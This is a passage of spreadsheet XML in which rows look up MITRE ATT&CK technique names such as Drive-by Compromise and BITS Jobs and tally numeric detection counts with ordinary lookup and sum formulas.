        <v>0</v>
      </c>
      <c r="AT32" s="12">
        <v>0</v>
      </c>
      <c r="AU32" s="13">
        <v>0</v>
      </c>
      <c r="AV32" s="394">
        <v>0</v>
      </c>
      <c r="AW32" s="392">
        <v>0</v>
      </c>
      <c r="AX32" s="392">
        <v>0</v>
      </c>
      <c r="AY32" s="322">
        <v>0</v>
      </c>
      <c r="AZ32" s="4">
        <v>0</v>
      </c>
      <c r="BA32" s="16">
        <v>0</v>
      </c>
      <c r="BB32" s="394">
        <v>0</v>
      </c>
      <c r="BC32" s="292">
        <v>0</v>
      </c>
      <c r="BD32" s="322">
        <v>0</v>
      </c>
      <c r="BE32" s="322">
        <v>0</v>
      </c>
      <c r="BF32" s="12">
        <v>0</v>
      </c>
      <c r="BG32" s="13">
        <v>0</v>
      </c>
      <c r="BH32" s="394">
        <v>0</v>
      </c>
      <c r="BI32" s="292">
        <v>7</v>
      </c>
      <c r="BJ32" s="322">
        <v>7</v>
      </c>
      <c r="BK32" s="322">
        <v>0</v>
      </c>
      <c r="BL32" s="12">
        <v>1</v>
      </c>
      <c r="BM32" s="13">
        <v>1</v>
      </c>
      <c r="BN32" s="394">
        <v>7</v>
      </c>
      <c r="BO32" s="292">
        <v>33</v>
      </c>
      <c r="BP32" s="322">
        <v>33</v>
      </c>
      <c r="BQ32" s="322">
        <v>0</v>
      </c>
      <c r="BR32" s="12">
        <v>1</v>
      </c>
      <c r="BS32" s="12">
        <v>4</v>
      </c>
      <c r="BT32" s="13">
        <v>1</v>
      </c>
      <c r="BU32" s="394">
        <v>10</v>
      </c>
      <c r="BV32" s="292">
        <v>0</v>
      </c>
      <c r="BW32" s="322">
        <v>0</v>
      </c>
      <c r="BX32" s="322">
        <v>0</v>
      </c>
      <c r="BY32" s="12">
        <v>0</v>
      </c>
      <c r="BZ32" s="13">
        <v>0</v>
      </c>
      <c r="CA32" s="394">
        <v>0</v>
      </c>
      <c r="CB32" s="292">
        <v>13</v>
      </c>
      <c r="CC32" s="322">
        <v>8</v>
      </c>
      <c r="CD32" s="322">
        <v>0</v>
      </c>
      <c r="CE32" s="12">
        <v>0</v>
      </c>
      <c r="CF32" s="12">
        <v>1</v>
      </c>
      <c r="CG32" s="13">
        <v>1</v>
      </c>
      <c r="CH32" s="394">
        <v>8</v>
      </c>
    </row>
    <row r="33" spans="1:86" ht="15" customHeight="1">
      <c r="A33" s="4">
        <f t="shared" si="0"/>
        <v>31</v>
      </c>
      <c r="B33" s="4" t="str">
        <f>IFERROR(VLOOKUP(A33,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1189</v>
      </c>
      <c r="C33" s="493" t="str">
        <f>IFERROR(VLOOKUP(B33,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Drive-by Compromise</v>
      </c>
      <c r="D33" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B33)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E33" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F33" s="579" t="str">
        <f t="shared" si="1"/>
        <v>2 (5)</v>
      </c>
      <c r="G33" s="292">
        <v>4</v>
      </c>
      <c r="H33" s="322">
        <v>3</v>
      </c>
      <c r="I33" s="322">
        <v>0</v>
      </c>
      <c r="J33" s="12">
        <v>1</v>
      </c>
      <c r="K33" s="13">
        <v>0.5</v>
      </c>
      <c r="L33" s="394">
        <v>3</v>
      </c>
      <c r="M33" s="322">
        <v>1</v>
      </c>
      <c r="N33" s="322">
        <v>1</v>
      </c>
      <c r="O33" s="322">
        <v>0</v>
      </c>
      <c r="P33" s="12">
        <v>1</v>
      </c>
      <c r="Q33" s="13">
        <v>0.5</v>
      </c>
      <c r="R33" s="394">
        <v>1</v>
      </c>
      <c r="S33" s="292">
        <v>5</v>
      </c>
      <c r="T33" s="322">
        <v>4</v>
      </c>
      <c r="U33" s="322">
        <v>0</v>
      </c>
      <c r="V33" s="12">
        <v>2</v>
      </c>
      <c r="W33" s="13">
        <v>1</v>
      </c>
      <c r="X33" s="394">
        <v>4</v>
      </c>
      <c r="Y33" s="392">
        <v>546</v>
      </c>
      <c r="Z33" s="392">
        <v>11</v>
      </c>
      <c r="AA33" s="322">
        <v>0</v>
      </c>
      <c r="AB33" s="392">
        <v>4</v>
      </c>
      <c r="AC33" s="16">
        <v>1</v>
      </c>
      <c r="AD33" s="394">
        <v>5</v>
      </c>
      <c r="AE33" s="392">
        <v>12</v>
      </c>
      <c r="AF33" s="392">
        <v>8</v>
      </c>
      <c r="AG33" s="322">
        <v>0</v>
      </c>
      <c r="AH33" s="392">
        <v>5</v>
      </c>
      <c r="AI33" s="16">
        <v>1</v>
      </c>
      <c r="AJ33" s="394">
        <v>2</v>
      </c>
      <c r="AK33" s="392">
        <v>558</v>
      </c>
      <c r="AL33" s="392">
        <v>19</v>
      </c>
      <c r="AM33" s="322">
        <v>0</v>
      </c>
      <c r="AN33" s="392">
        <v>9</v>
      </c>
      <c r="AO33" s="16">
        <v>1</v>
      </c>
      <c r="AP33" s="394">
        <v>5</v>
      </c>
      <c r="AQ33" s="292">
        <v>0</v>
      </c>
      <c r="AR33" s="322">
        <v>0</v>
      </c>
      <c r="AS33" s="322">
        <v>0</v>
      </c>
      <c r="AT33" s="12">
        <v>0</v>
      </c>
      <c r="AU33" s="13">
        <v>0</v>
      </c>
      <c r="AV33" s="394">
        <v>0</v>
      </c>
      <c r="AW33" s="392">
        <v>4</v>
      </c>
      <c r="AX33" s="392">
        <v>1</v>
      </c>
      <c r="AY33" s="322">
        <v>0</v>
      </c>
      <c r="AZ33" s="4">
        <v>1</v>
      </c>
      <c r="BA33" s="16">
        <v>0.5</v>
      </c>
      <c r="BB33" s="394">
        <v>1</v>
      </c>
      <c r="BC33" s="292">
        <v>9</v>
      </c>
      <c r="BD33" s="322">
        <v>5</v>
      </c>
      <c r="BE33" s="322">
        <v>0</v>
      </c>
      <c r="BF33" s="12">
        <v>3</v>
      </c>
      <c r="BG33" s="13">
        <v>1</v>
      </c>
      <c r="BH33" s="394">
        <v>5</v>
      </c>
      <c r="BI33" s="292">
        <v>3</v>
      </c>
      <c r="BJ33" s="322">
        <v>3</v>
      </c>
      <c r="BK33" s="322">
        <v>0</v>
      </c>
      <c r="BL33" s="12">
        <v>1</v>
      </c>
      <c r="BM33" s="13">
        <v>0.5</v>
      </c>
      <c r="BN33" s="394">
        <v>3</v>
      </c>
      <c r="BO33" s="292">
        <v>12</v>
      </c>
      <c r="BP33" s="322">
        <v>12</v>
      </c>
      <c r="BQ33" s="322">
        <v>0</v>
      </c>
      <c r="BR33" s="12">
        <v>1</v>
      </c>
      <c r="BS33" s="12">
        <v>3</v>
      </c>
      <c r="BT33" s="13">
        <v>1</v>
      </c>
      <c r="BU33" s="394">
        <v>5</v>
      </c>
      <c r="BV33" s="292">
        <v>0</v>
      </c>
      <c r="BW33" s="322">
        <v>0</v>
      </c>
      <c r="BX33" s="322">
        <v>0</v>
      </c>
      <c r="BY33" s="12">
        <v>0</v>
      </c>
      <c r="BZ33" s="13">
        <v>0</v>
      </c>
      <c r="CA33" s="394">
        <v>0</v>
      </c>
      <c r="CB33" s="292">
        <v>9</v>
      </c>
      <c r="CC33" s="322">
        <v>4</v>
      </c>
      <c r="CD33" s="322">
        <v>0</v>
      </c>
      <c r="CE33" s="12">
        <v>0</v>
      </c>
      <c r="CF33" s="12">
        <v>1</v>
      </c>
      <c r="CG33" s="13">
        <v>1</v>
      </c>
      <c r="CH33" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="34" spans="1:86" ht="15" customHeight="1">
      <c r="A34" s="4">
        <f t="shared" si="0"/>
        <v>32</v>
      </c>
      <c r="B34" s="4" t="str">
        <f>IFERROR(VLOOKUP(A34,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1190</v>
      </c>
      <c r="C34" s="493" t="str">
        <f>IFERROR(VLOOKUP(B34,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="D34" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B34)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>5</v>
      </c>
      <c r="E34" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>130</v>
      </c>
      <c r="F34" s="579" t="str">
        <f t="shared" si="1"/>
        <v>5 (130)</v>
      </c>
      <c r="G34" s="292">
        <v>43</v>
      </c>
      <c r="H34" s="322">
        <v>41</v>
      </c>
      <c r="I34" s="322">
        <v>0</v>
      </c>
      <c r="J34" s="12">
        <v>3</v>
      </c>
      <c r="K34" s="13">
        <v>0.8</v>
      </c>
      <c r="L34" s="394">
        <v>39</v>
      </c>
      <c r="M34" s="322">
        <v>216</v>
      </c>
      <c r="N34" s="322">
        <v>214</v>
      </c>
      <c r="O34" s="322">
        <v>0</v>
      </c>
      <c r="P34" s="12">
        <v>18</v>
      </c>
      <c r="Q34" s="13">
        <v>1</v>
      </c>
      <c r="R34" s="394">
        <v>106</v>
      </c>
      <c r="S34" s="292">
        <v>259</v>
      </c>
      <c r="T34" s="322">
        <v>255</v>
      </c>
      <c r="U34" s="322">
        <v>0</v>
      </c>
      <c r="V34" s="12">
        <v>21</v>
      </c>
      <c r="W34" s="13">
        <v>1</v>
      </c>
      <c r="X34" s="394">
        <v>114</v>
      </c>
      <c r="Y34" s="392">
        <v>395</v>
      </c>
      <c r="Z34" s="392">
        <v>384</v>
      </c>
      <c r="AA34" s="322">
        <v>0</v>
      </c>
      <c r="AB34" s="392">
        <v>18</v>
      </c>
      <c r="AC34" s="16">
        <v>1</v>
      </c>
      <c r="AD34" s="394">
        <v>123</v>
      </c>
      <c r="AE34" s="392">
        <v>318</v>
      </c>
      <c r="AF34" s="392">
        <v>305</v>
      </c>
      <c r="AG34" s="322">
        <v>0</v>
      </c>
      <c r="AH34" s="392">
        <v>25</v>
      </c>
      <c r="AI34" s="16">
        <v>1</v>
      </c>
      <c r="AJ34" s="394">
        <v>110</v>
      </c>
      <c r="AK34" s="392">
        <v>642</v>
      </c>
      <c r="AL34" s="392">
        <v>622</v>
      </c>
      <c r="AM34" s="322">
        <v>0</v>
      </c>
      <c r="AN34" s="392">
        <v>40</v>
      </c>
      <c r="AO34" s="16">
        <v>1</v>
      </c>
      <c r="AP34" s="394">
        <v>123</v>
      </c>
      <c r="AQ34" s="292">
        <v>0</v>
      </c>
      <c r="AR34" s="322">
        <v>0</v>
      </c>
      <c r="AS34" s="322">
        <v>0</v>
      </c>
      <c r="AT34" s="12">
        <v>0</v>
      </c>
      <c r="AU34" s="13">
        <v>0</v>
      </c>
      <c r="AV34" s="394">
        <v>0</v>
      </c>
      <c r="AW34" s="392">
        <v>5</v>
      </c>
      <c r="AX34" s="392">
        <v>5</v>
      </c>
      <c r="AY34" s="322">
        <v>0</v>
      </c>
      <c r="AZ34" s="4">
        <v>4</v>
      </c>
      <c r="BA34" s="16">
        <v>0.6</v>
      </c>
      <c r="BB34" s="394">
        <v>3</v>
      </c>
      <c r="BC34" s="292">
        <v>264</v>
      </c>
      <c r="BD34" s="322">
        <v>260</v>
      </c>
      <c r="BE34" s="322">
        <v>0</v>
      </c>
      <c r="BF34" s="12">
        <v>25</v>
      </c>
      <c r="BG34" s="13">
        <v>1</v>
      </c>
      <c r="BH34" s="394">
        <v>114</v>
      </c>
      <c r="BI34" s="292">
        <v>202</v>
      </c>
      <c r="BJ34" s="322">
        <v>188</v>
      </c>
      <c r="BK34" s="322">
        <v>0</v>
      </c>
      <c r="BL34" s="12">
        <v>3</v>
      </c>
      <c r="BM34" s="13">
        <v>1</v>
      </c>
      <c r="BN34" s="394">
        <v>114</v>
      </c>
      <c r="BO34" s="292">
        <v>370</v>
      </c>
      <c r="BP34" s="322">
        <v>356</v>
      </c>
      <c r="BQ34" s="322">
        <v>0</v>
      </c>
      <c r="BR34" s="12">
        <v>3</v>
      </c>
      <c r="BS34" s="12">
        <v>2</v>
      </c>
      <c r="BT34" s="13">
        <v>1</v>
      </c>
      <c r="BU34" s="394">
        <v>123</v>
      </c>
      <c r="BV34" s="292">
        <v>63</v>
      </c>
      <c r="BW34" s="322">
        <v>37</v>
      </c>
      <c r="BX34" s="322">
        <v>0</v>
      </c>
      <c r="BY34" s="12">
        <v>2</v>
      </c>
      <c r="BZ34" s="13">
        <v>0.6</v>
      </c>
      <c r="CA34" s="394">
        <v>36</v>
      </c>
      <c r="CB34" s="292">
        <v>260</v>
      </c>
      <c r="CC34" s="322">
        <v>158</v>
      </c>
      <c r="CD34" s="322">
        <v>0</v>
      </c>
      <c r="CE34" s="12">
        <v>2</v>
      </c>
      <c r="CF34" s="12">
        <v>1</v>
      </c>
      <c r="CG34" s="13">
        <v>0.6</v>
      </c>
      <c r="CH34" s="394">
        <v>121</v>
      </c>
    </row>
    <row r="35" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A35" s="4">
        <f t="shared" si="0"/>
        <v>33</v>
      </c>
      <c r="B35" s="4" t="str">
        <f>IFERROR(VLOOKUP(A35,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1197</v>
      </c>
      <c r="C35" s="493" t="str">
        <f>IFERROR(VLOOKUP(B35,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>BITS Jobs</v>
      </c>
      <c r="D35" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B35)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E35" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>43</v>
      </c>
      <c r="F35" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (43)</v>
      </c>
      <c r="G35" s="292">
        <v>7</v>
      </c>
      <c r="H35" s="322">
        <v>3</v>
      </c>
      <c r="I35" s="322">
        <v>0</v>
      </c>
      <c r="J35" s="12">
        <v>2</v>
      </c>
      <c r="K35" s="13">
        <v>1</v>
      </c>
      <c r="L35" s="394">
        <v>3</v>
      </c>
      <c r="M35" s="322">
        <v>38</v>
      </c>
      <c r="N35" s="322">
        <v>32</v>
      </c>
      <c r="O35" s="322">
        <v>0</v>
      </c>
      <c r="P35" s="12">
        <v>6</v>
      </c>
      <c r="Q35" s="13">
        <v>1</v>
      </c>
      <c r="R35" s="394">
        <v>10</v>
      </c>
      <c r="S35" s="292">
        <v>45</v>
      </c>
      <c r="T35" s="322">
        <v>35</v>
      </c>
      <c r="U35" s="322">
        <v>0</v>
      </c>
      <c r="V35" s="12">
        <v>8</v>
      </c>
      <c r="W35" s="13">
        <v>1</v>
      </c>
      <c r="X35" s="394">
        <v>11</v>
      </c>
      <c r="Y35" s="392">
        <v>53</v>
      </c>
      <c r="Z35" s="392">
        <v>37</v>
      </c>
      <c r="AA35" s="322">
        <v>0</v>
      </c>
      <c r="AB35" s="392">
        <v>9</v>
      </c>
      <c r="AC35" s="16">
        <v>1</v>
      </c>
      <c r="AD35" s="394">
        <v>13</v>
      </c>
      <c r="AE35" s="392">
        <v>62</v>
      </c>
      <c r="AF35" s="392">
        <v>48</v>
      </c>
      <c r="AG35" s="322">
        <v>0</v>
      </c>
      <c r="AH35" s="392">
        <v>12</v>
      </c>
      <c r="AI35" s="16">
        <v>1</v>
      </c>
      <c r="AJ35" s="394">
        <v>12</v>
      </c>
      <c r="AK35" s="392">
        <v>115</v>
      </c>
      <c r="AL35" s="392">
        <v>85</v>
      </c>
      <c r="AM35" s="322">
        <v>0</v>
      </c>
      <c r="AN35" s="392">
        <v>21</v>
      </c>
      <c r="AO35" s="16">
        <v>1</v>
      </c>
      <c r="AP35" s="394">
        <v>15</v>
      </c>
      <c r="AQ35" s="292">
        <v>0</v>
      </c>
      <c r="AR35" s="322">
        <v>0</v>
      </c>
      <c r="AS35" s="322">
        <v>0</v>
      </c>
      <c r="AT35" s="12">
        <v>0</v>
      </c>
      <c r="AU35" s="13">
        <v>0</v>
      </c>
      <c r="AV35" s="394">
        <v>0</v>
      </c>
      <c r="AW35" s="392">
        <v>12</v>
      </c>
      <c r="AX35" s="392">
        <v>6</v>
      </c>
      <c r="AY35" s="322">
        <v>0</v>
      </c>
      <c r="AZ35" s="4">
        <v>2</v>
      </c>
      <c r="BA35" s="16">
        <v>1</v>
      </c>
      <c r="BB35" s="394">
        <v>6</v>
      </c>
      <c r="BC35" s="292">
        <v>57</v>
      </c>
      <c r="BD35" s="322">
        <v>41</v>
      </c>
      <c r="BE35" s="322">
        <v>0</v>
      </c>
      <c r="BF35" s="12">
        <v>10</v>
      </c>
      <c r="BG35" s="13">
        <v>1</v>
      </c>
      <c r="BH35" s="394">
        <v>13</v>
      </c>
      <c r="BI35" s="292">
        <v>5</v>
      </c>
      <c r="BJ35" s="322">
        <v>3</v>
      </c>
      <c r="BK35" s="322">
        <v>0</v>
      </c>
      <c r="BL35" s="12">
        <v>2</v>
      </c>
      <c r="BM35" s="13">
        <v>1</v>
      </c>
      <c r="BN35" s="394">
        <v>2</v>
      </c>
      <c r="BO35" s="292">
        <v>32</v>
      </c>
      <c r="BP35" s="322">
        <v>26</v>
      </c>
      <c r="BQ35" s="322">
        <v>0</v>
      </c>
      <c r="BR35" s="12">
        <v>2</v>
      </c>
      <c r="BS35" s="12">
        <v>7</v>
      </c>
      <c r="BT35" s="13">
        <v>1</v>
      </c>
      <c r="BU35" s="394">
        <v>25</v>
      </c>
      <c r="BV35" s="292">
        <v>0</v>
      </c>
      <c r="BW35" s="322">
        <v>0</v>
      </c>
      <c r="BX35" s="322">
        <v>0</v>
      </c>
      <c r="BY35" s="12">
        <v>0</v>
      </c>
      <c r="BZ35" s="13">
        <v>0</v>
      </c>
      <c r="CA35" s="394">
        <v>0</v>
      </c>
      <c r="CB35" s="292">
        <v>8</v>
      </c>
      <c r="CC35" s="322">
        <v>8</v>
      </c>
      <c r="CD35" s="322">
        <v>0</v>
      </c>
      <c r="CE35" s="12">
        <v>0</v>
      </c>
      <c r="CF35" s="12">
        <v>1</v>
      </c>
      <c r="CG35" s="13">
        <v>1</v>
      </c>
      <c r="CH35" s="394">
        <v>8</v>
      </c>
    </row>
    <row r="36" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A36" s="4">
        <f t="shared" si="0"/>
        <v>34</v>
      </c>
      <c r="B36" s="4" t="str">
        <f>IFERROR(VLOOKUP(A36,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1199</v>
      </c>
      <c r="C36" s="493" t="str">
        <f>IFERROR(VLOOKUP(B36,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Trusted Relationship</v>
      </c>
      <c r="D36" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B36)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E36" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>18</v>
      </c>
      <c r="F36" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (18)</v>
      </c>
      <c r="G36" s="292">
        <v>6</v>
      </c>
      <c r="H36" s="322">
        <v>1</v>
      </c>
      <c r="I36" s="322">
        <v>0</v>
      </c>
      <c r="J36" s="12">
        <v>1</v>
      </c>
      <c r="K36" s="13">
        <v>1</v>
      </c>
      <c r="L36" s="394">
        <v>1</v>
      </c>
      <c r="M36" s="322">
        <v>2</v>
      </c>
      <c r="N36" s="322">
        <v>2</v>
      </c>
      <c r="O36" s="322">
        <v>0</v>
      </c>
      <c r="P36" s="12">
        <v>1</v>
      </c>
      <c r="Q36" s="13">
        <v>1</v>
      </c>
      <c r="R36" s="394">
        <v>2</v>
      </c>
      <c r="S36" s="292">
        <v>8</v>
      </c>
      <c r="T36" s="322">
        <v>3</v>
      </c>
      <c r="U36" s="322">
        <v>0</v>
      </c>
      <c r="V36" s="12">
        <v>2</v>
      </c>
      <c r="W36" s="13">
        <v>1</v>
      </c>
      <c r="X36" s="394">
        <v>2</v>
      </c>
      <c r="Y36" s="392">
        <v>9</v>
      </c>
      <c r="Z36" s="392">
        <v>4</v>
      </c>
      <c r="AA36" s="322">
        <v>0</v>
      </c>
      <c r="AB36" s="392">
        <v>3</v>
      </c>
      <c r="AC36" s="16">
        <v>1</v>
      </c>
      <c r="AD36" s="394">
        <v>3</v>
      </c>
      <c r="AE36" s="392">
        <v>17</v>
      </c>
      <c r="AF36" s="392">
        <v>17</v>
      </c>
      <c r="AG36" s="322">
        <v>0</v>
      </c>
      <c r="AH36" s="392">
        <v>11</v>
      </c>
      <c r="AI36" s="16">
        <v>1</v>
      </c>
      <c r="AJ36" s="394">
        <v>5</v>
      </c>
      <c r="AK36" s="392">
        <v>26</v>
      </c>
      <c r="AL36" s="392">
        <v>21</v>
      </c>
      <c r="AM36" s="322">
        <v>0</v>
      </c>
      <c r="AN36" s="392">
        <v>14</v>
      </c>
      <c r="AO36" s="16">
        <v>1</v>
      </c>
      <c r="AP36" s="394">
        <v>5</v>
      </c>
      <c r="AQ36" s="292">
        <v>0</v>
      </c>
      <c r="AR36" s="322">
        <v>0</v>
      </c>
      <c r="AS36" s="322">
        <v>0</v>
      </c>
      <c r="AT36" s="12">
        <v>0</v>
      </c>
      <c r="AU36" s="13">
        <v>0</v>
      </c>
      <c r="AV36" s="394">
        <v>0</v>
      </c>
      <c r="AW36" s="392">
        <v>3</v>
      </c>
      <c r="AX36" s="392">
        <v>3</v>
      </c>
      <c r="AY36" s="322">
        <v>0</v>
      </c>
      <c r="AZ36" s="4">
        <v>2</v>
      </c>
      <c r="BA36" s="16">
        <v>1</v>
      </c>
      <c r="BB36" s="394">
        <v>3</v>
      </c>
      <c r="BC36" s="292">
        <v>11</v>
      </c>
      <c r="BD36" s="322">
        <v>6</v>
      </c>
      <c r="BE36" s="322">
        <v>0</v>
      </c>
      <c r="BF36" s="12">
        <v>4</v>
      </c>
      <c r="BG36" s="13">
        <v>1</v>
      </c>
      <c r="BH36" s="394">
        <v>3</v>
      </c>
      <c r="BI36" s="292">
        <v>1</v>
      </c>
      <c r="BJ36" s="322">
        <v>1</v>
      </c>
      <c r="BK36" s="322">
        <v>0</v>
      </c>
      <c r="BL36" s="12">
        <v>1</v>
      </c>
      <c r="BM36" s="13">
        <v>1</v>
      </c>
      <c r="BN36" s="394">
        <v>1</v>
      </c>
      <c r="BO36" s="292">
        <v>11</v>
      </c>
      <c r="BP36" s="322">
        <v>11</v>
      </c>
      <c r="BQ36" s="322">
        <v>0</v>
      </c>
      <c r="BR36" s="12">
        <v>1</v>
      </c>
      <c r="BS36" s="12">
        <v>4</v>
      </c>
      <c r="BT36" s="13">
        <v>1</v>
      </c>
      <c r="BU36" s="394">
        <v>10</v>
      </c>
      <c r="BV36" s="292">
        <v>0</v>
      </c>
      <c r="BW36" s="322">
        <v>0</v>
      </c>
      <c r="BX36" s="322">
        <v>0</v>
      </c>
      <c r="BY36" s="12">
        <v>0</v>
      </c>
      <c r="BZ36" s="13">
        <v>0</v>
      </c>
      <c r="CA36" s="394">
        <v>0</v>
      </c>
      <c r="CB36" s="292">
        <v>0</v>
      </c>
      <c r="CC36" s="322">
        <v>0</v>
      </c>
      <c r="CD36" s="322">
        <v>0</v>
      </c>
      <c r="CE36" s="12">
        <v>0</v>
      </c>
      <c r="CF36" s="12">
        <v>0</v>
      </c>
      <c r="CG36" s="13">
        <v>0</v>
      </c>
      <c r="CH36" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A37" s="4">
        <f t="shared" si="0"/>
        <v>35</v>
      </c>
      <c r="B37" s="4" t="str">
        <f>IFERROR(VLOOKUP(A37,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1200</v>
      </c>
      <c r="C37" s="493" t="str">
        <f>IFERROR(VLOOKUP(B37,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Hardware Additions</v>
      </c>
      <c r="D37" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B37)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E37" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F37" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (3)</v>
      </c>
      <c r="G37" s="292">
        <v>6</v>
      </c>
      <c r="H37" s="322">
        <v>1</v>
      </c>
      <c r="I37" s="322">
        <v>0</v>
      </c>
      <c r="J37" s="12">
        <v>1</v>
      </c>
      <c r="K37" s="13">
        <v>1</v>
      </c>
      <c r="L37" s="394">
        <v>1</v>
      </c>
      <c r="M37" s="322">
        <v>0</v>
      </c>
      <c r="N37" s="322">
        <v>0</v>
      </c>
      <c r="O37" s="322">
        <v>0</v>
      </c>
      <c r="P37" s="12">
        <v>0</v>
      </c>
      <c r="Q37" s="13">
        <v>0</v>
      </c>
      <c r="R37" s="394">
        <v>0</v>
      </c>
      <c r="S37" s="292">
        <v>6</v>
      </c>
      <c r="T37" s="322">
        <v>1</v>
      </c>
      <c r="U37" s="322">
        <v>0</v>
      </c>
      <c r="V37" s="12">
        <v>1</v>
      </c>
      <c r="W37" s="13">
        <v>1</v>
      </c>
      <c r="X37" s="394">
        <v>1</v>
      </c>
      <c r="Y37" s="392">
        <v>7</v>
      </c>
      <c r="Z37" s="392">
        <v>2</v>
      </c>
      <c r="AA37" s="322">
        <v>0</v>
      </c>
      <c r="AB37" s="392">
        <v>2</v>
      </c>
      <c r="AC37" s="16">
        <v>1</v>
      </c>
      <c r="AD37" s="394">
        <v>1</v>
      </c>
      <c r="AE37" s="392">
        <v>11</v>
      </c>
      <c r="AF37" s="392">
        <v>4</v>
      </c>
      <c r="AG37" s="322">
        <v>0</v>
      </c>
      <c r="AH37" s="392">
        <v>4</v>
      </c>
      <c r="AI37" s="16">
        <v>1</v>
      </c>
      <c r="AJ37" s="394">
        <v>2</v>
      </c>
      <c r="AK37" s="392">
        <v>18</v>
      </c>
      <c r="AL37" s="392">
        <v>6</v>
      </c>
      <c r="AM37" s="322">
        <v>0</v>
      </c>
      <c r="AN37" s="392">
        <v>6</v>
      </c>
      <c r="AO37" s="16">
        <v>1</v>
      </c>
      <c r="AP37" s="394">
        <v>2</v>
      </c>
      <c r="AQ37" s="292">
        <v>0</v>
      </c>
      <c r="AR37" s="322">
        <v>0</v>
      </c>
      <c r="AS37" s="322">
        <v>0</v>
      </c>
      <c r="AT37" s="12">
        <v>0</v>
      </c>
      <c r="AU37" s="13">
        <v>0</v>
      </c>
      <c r="AV37" s="394">
        <v>0</v>
      </c>
      <c r="AW37" s="392">
        <v>1</v>
      </c>
      <c r="AX37" s="392">
        <v>1</v>
      </c>
      <c r="AY37" s="322">
        <v>0</v>
      </c>
      <c r="AZ37" s="4">
        <v>1</v>
      </c>
      <c r="BA37" s="16">
        <v>1</v>
      </c>
      <c r="BB37" s="394">
        <v>1</v>
      </c>
      <c r="BC37" s="292">
        <v>7</v>
      </c>
      <c r="BD37" s="322">
        <v>2</v>
      </c>
      <c r="BE37" s="322">
        <v>0</v>
      </c>
      <c r="BF37" s="12">
        <v>2</v>
      </c>
      <c r="BG37" s="13">
        <v>1</v>
      </c>
      <c r="BH37" s="394">
        <v>1</v>
      </c>
      <c r="BI37" s="292">
        <v>0</v>
      </c>
      <c r="BJ37" s="322">
        <v>0</v>
      </c>
      <c r="BK37" s="322">
        <v>0</v>
      </c>
      <c r="BL37" s="12">
        <v>0</v>
      </c>
      <c r="BM37" s="13">
        <v>0</v>
      </c>
      <c r="BN37" s="394">
        <v>0</v>
      </c>
      <c r="BO37" s="292">
        <v>4</v>
      </c>
      <c r="BP37" s="322">
        <v>4</v>
      </c>
      <c r="BQ37" s="322">
        <v>0</v>
      </c>
      <c r="BR37" s="12">
        <v>0</v>
      </c>
      <c r="BS37" s="12">
        <v>4</v>
      </c>
      <c r="BT37" s="13">
        <v>1</v>
      </c>
      <c r="BU37" s="394">
        <v>3</v>
      </c>
      <c r="BV37" s="292">
        <v>0</v>
      </c>
      <c r="BW37" s="322">
        <v>0</v>
      </c>
      <c r="BX37" s="322">
        <v>0</v>
      </c>
      <c r="BY37" s="12">
        <v>0</v>
      </c>
      <c r="BZ37" s="13">
        <v>0</v>
      </c>
      <c r="CA37" s="394">
        <v>0</v>
      </c>
      <c r="CB37" s="292">
        <v>1</v>
      </c>
      <c r="CC37" s="322">
        <v>1</v>
      </c>
      <c r="CD37" s="322">
        <v>0</v>
      </c>
